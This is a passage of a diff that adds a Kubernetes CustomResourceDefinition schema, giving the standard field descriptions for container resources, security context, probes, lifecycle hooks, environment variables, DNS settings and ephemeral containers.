^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security + options the container should be run with. If set, + the fields of SecurityContext override the equivalent + fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false. + type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. + type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod + has successfully initialized. If specified, no + other probes are executed until this completes + successfully. If this probe fails, the Pod will + be restarted, just as if the livenessProbe failed. + This can be used to provide different probe parameters + at the beginning of a Pod''s lifecycle, when it + might take a long time to load data or warm a + cache, than during steady-state operation. This + cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate + a buffer for stdin in the container runtime. If + this is not set, reads from stdin in the container + will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should + close the stdin channel after it has been opened + by a single attach. When stdin is true the stdin + stream will remain open across multiple attach + sessions. If stdinOnce is set to true, stdin is + opened on container start, is empty until the + first client attaches to stdin, and then remains + open and accepts data until the client disconnects, + at which time stdin is closed and remains closed + until the container is restarted. If this flag + is false, a container processes that reads from + stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to + which the container''s termination message will + be written is mounted into the container''s filesystem. + Message written is intended to be brief final + status, such as an assertion failure message. + Will be truncated by the node if greater than + 4096 bytes. The total message length across all + containers will be limited to 12kb. Defaults to + /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message + should be populated. File will use the contents + of terminationMessagePath to populate the container + status message on both success and failure. FallbackToLogsOnError + will use the last chunk of container log output + if the termination message file is empty and the + container exited with an error. The log output + is limited to 2048 bytes or 80 lines, whichever + is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate + a TTY for itself, also requires 'stdin' to be + true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block + devices to be used by the container. + items: + description: volumeDevice describes a mapping + of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside + of the container that the device will be + mapped to. + type: string + name: + description: name must match the name of a + persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's + filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + dnsConfig: + description: Specifies the DNS parameters of a pod. Parameters + specified here will be merged to the generated DNS configuration + based on DNSPolicy. + properties: + nameservers: + description: A list of DNS name server IP addresses. + This will be appended to the base nameservers generated + from DNSPolicy. Duplicated nameservers will be removed. + items: + type: string + type: array + options: + description: A list of DNS resolver options. This + will be merged with the base options generated from + DNSPolicy. Duplicated entries will be removed. Resolution + options given in Options will override those that + appear in the base DNSPolicy. + items: + description: PodDNSConfigOption defines DNS resolver + options of a pod. + properties: + name: + description: Required. + type: string + value: + type: string + type: object + type: array + searches: + description: A list of DNS search domains for host-name + lookup. This will be appended to the base search + paths generated from DNSPolicy. Duplicated search + paths will be removed. + items: + type: string + type: array + type: object + dnsPolicy: + description: Set DNS policy for the pod. Defaults to "ClusterFirst". + Valid values are 'ClusterFirstWithHostNet', 'ClusterFirst', + 'Default' or 'None'. DNS parameters given in DNSConfig + will be merged with the policy selected with DNSPolicy. + To have DNS options set along with hostNetwork, you + have to specify DNS policy explicitly to 'ClusterFirstWithHostNet'. + type: string + enableServiceLinks: + description: 'EnableServiceLinks indicates whether information + about services should be injected into pod''s environment + variables, matching the syntax of Docker links. Optional: + Defaults to true.' + type: boolean + ephemeralContainers: + description: List of ephemeral containers run in this + pod. Ephemeral containers may be run in an existing + pod to perform user-initiated actions such as debugging. + This list cannot be specified when creating a pod, and + it cannot be modified by updating the pod spec. In order + to add an ephemeral container to an existing pod, use + the pod's ephemeralcontainers subresource. This field + is alpha-level and is only honored by servers that enable + the EphemeralContainers feature. + items: + description: An EphemeralContainer is a container that + may be added temporarily to an existing pod for user-initiated + activities such as debugging. Ephemeral containers + have no resource or scheduling guarantees, and they + will not be restarted when they exit or when a pod + is removed or restarted. If an ephemeral container + causes a pod to exceed its resource allocation, the + pod may be evicted. Ephemeral containers may not be + added by directly updating the pod spec. They must + be added via the pod's ephemeralcontainers subresource, + and they will appear in the pod spec once added. This + is an alpha feature enabled by the EphemeralContainers + feature flag. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. + If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. + "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels['''']`, `metadata.annotations['''']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Lifecycle is not allowed for ephemeral + containers. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hooked is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the ephemeral container specified + as a DNS_LABEL. This name must be unique among + all containers, init containers and ephemeral + containers. + type: string + ports: + description: Ports are not allowed for ephemeral + containers. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + readinessProbe: + description: Probes are not allowed for ephemeral + containers. + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: Resources are not allowed for ephemeral + containers. Ephemeral containers use spare resources + already allocated to the pod. + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'Optional: SecurityContext defines + the security options the ephemeral container should + be run with. If set, the fields of SecurityContext + override the equivalent fields of PodSecurityContext.' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in 